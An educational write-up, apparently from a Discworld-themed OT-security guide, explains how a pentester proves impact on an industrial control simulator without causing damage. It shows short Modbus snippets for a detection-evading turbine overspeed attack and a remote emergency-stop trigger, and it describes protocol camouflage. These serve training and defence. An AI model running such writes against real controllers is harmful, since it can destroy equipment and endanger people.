Proof of concept exploits: Demonstrating impact without destruction

Or: How Ponder showed what could happen without actually making it happen

The delicate balance

The Patrician has a saying about demonstrations of power: the most effective demonstration is the one you never quite have to perform. The credible threat of action is often more valuable than the action itself, particularly when the action in question might accidentally shut down half the city’s power supply or turn a turbine into an unscheduled disassembly event.

Proof of concept development in OT security, Ponder discovered, is the art of proving you could do something catastrophic without actually doing it. This is rather more important in OT than in IT. In IT penetration testing, you might actually exfiltrate data (with permission) or actually compromise systems (in a controlled way) to prove impact. In OT, “actually demonstrating” that you can shut down turbines by shutting down turbines is the sort of thing that gets people hurt, gets you arrested, and gets the entire concept of security testing banned from the facility.

The challenge is demonstrating sufficient proof that stakeholders take findings seriously, without demonstrating so much proof that you cause actual harm.

The simulator’s exploitation scripts

The UU P&L simulator provided a safe environment where Ponder could demonstrate actual exploitation without risking actual infrastructure. The exploitation scripts in scripts/exploitation/ showed what attacks could do:

Turbine overspeed attack

turbine_overspeed_attack.py

This script demonstrated a gradual overspeed attack against the turbine controller. Instead of immediately setting dangerous speeds (which would trigger safety systems), it incrementally increased the speed setpoint over time:

# Gradual overspeed - harder to detect
for new_speed in range(current_speed, target_speed, step_size):
    client.write_register(SPEED_SETPOINT, new_speed)
    time.sleep(delay_between_steps)

What it demonstrates:

  • Unauthenticated Modbus write access

  • Ability to modify physical process parameters

  • Techniques for evading rate-of-change detection

  • How gradual attacks can be harder to detect than sudden ones

Impact: In a real system, turbine overspeed can cause mechanical failure, catastrophic disassembly, or triggering of emergency shutdown systems. The simulator shows this is technically possible without actually destroying a turbine.

Emergency stop attack

turbine_emergency_stop.py

This script demonstrated triggering emergency stops via Modbus:

# Trigger emergency stop via coil write
client.write_coil(EMERGENCY_STOP_COIL, True)

What it demonstrates:

  • Ability to trigger safety systems remotely

  • Denial of service through emergency shutdowns

  • How easily critical controls can be activated

Impact: Emergency stops cause immediate production loss, potential equipment damage from rapid shutdown, and safety system tests/recalibration requirements. The simulator demonstrates the vulnerability without causing actual downtime.

Protocol camouflage

protocol_camouflage.py

This script demonstrated hiding malicious commands within legitimate-looking protocol traffic:

What it demonstrates:

  • How to craft attacks that look like normal operations

  • Techniques for evading signature-based detection

  • The difficulty of distinguishing malicious from legitimate traffic

Impact: Shows that network monitoring alone isn’t sufficient if attackers can make their traffic appear legitimate.

Other exploitation demonstrations

The simulator includes additional exploitation scripts demonstrating various attack techniques:

Safe exploitation boundaries

The simulator enforces safe testing by design:

Green (safe in simulator):

  • All reconnaissance scripts (read-only protocol access)

  • All vulnerability assessment scripts (enumerate but don’t modify)

  • Exploitation scripts against simulator (no real equipment at risk)

  • Detection testing (generate suspicious traffic safely)

Amber (caution even in simulator):

  • Scripts that modify simulator state (overspeed, emergency stop)

  • High-volume scanning (could affect simulator performance)

  • Tests that trigger multiple alarm conditions

Red (never on production):

  • Any exploitation script against real equipment

  • Any script that writes to production PLCs

  • Any testing that could affect physical processes

The simulator lets you practise in Green, understand the risks of Amber, and learn why Red requires extreme caution.

Read-only demonstrations

Before running exploitation scripts, Ponder’s approach was always to demonstrate impact through read-only reconnaissance:

What can be read:

Impact demonstrated:

  • Intellectual property theft (control algorithms)

  • Operational intelligence (production rates, setpoints)

  • Attack planning (understanding system behaviour)

  • Safety information disclosure (alarm thresholds, safety limits)

Often, demonstrating read access was sufficient to prove that write access would also be possible. If you can read a Modbus register, you can write to it. If you can download PLC blocks, you could upload modified blocks. The simulator makes these connections explicit.

Testing on the simulator

The simulator provides several advantages for PoC development:

No physical consequences: Overspeed attacks don’t destroy real turbines. Emergency stops don’t cause actual downtime.

Repeatable testing: Reset and test again. Iterate on attack techniques without risk.

Full observability: See exactly what the attack does to PLC memory, register values, and system state.

Safe learning environment: Understand attack mechanics before dealing with real systems.

Documentation: Scripts demonstrate attack techniques with actual code, not just descriptions.

Ponder’s approach to PoC development

Ponder’s testing journal documented his methodology:

“Start with reconnaissance. Show what you can read. If you can read everything, stakeholders usually understand that writing is possible too.

“If read access isn’t convincing enough, demonstrate on the simulator. Show the attack working. Screen recording, saved output, detailed logs. Make it clear this is the simulator, not production.

“Never demonstrate write attacks on production unless:

  1. You have explicit written approval

  2. The system is in a safe state

  3. Someone can physically intervene

  4. You have verified rollback procedures

  5. You understand the physical consequences

“And even then, consider whether a simulator demonstration would be sufficient. Usually it is.

“The goal is to prove risk, not to create incidents. The simulator lets us do the former without the latter.”

Script output and documentation

All exploitation scripts save detailed output to reports/:

reports/
├── turbine_overspeed_20260204_141523.json
├── emergency_stop_20260204_142011.json
├── protocol_camouflage_20260204_143045.json
└── ...

Each report includes:

  • Timestamp and target information

  • Attack parameters and configuration

  • Observed responses from targets

  • Success/failure indicators

  • Security implications

These reports demonstrate impact without requiring stakeholders to understand the technical details of how Modbus function codes work or what S7 memory areas are.

The educational value

The exploitation scripts teach several lessons:

Attacks are often simple: No zero-days required. Just unauthenticated protocols and basic commands.

Impact is physical: These aren’t just network exploits. They affect real-world processes.

Detection is difficult: Malicious commands look exactly like legitimate commands.

Defence requires depth: Protocol security alone isn’t sufficient.

The simulator demonstrates these lessons safely, preparing security professionals for real OT environments where mistakes have physical consequences.

Further reading:

The exploitation scripts demonstrate real attack capabilities in a safe environment, teaching both offensive and defensive OT security principles.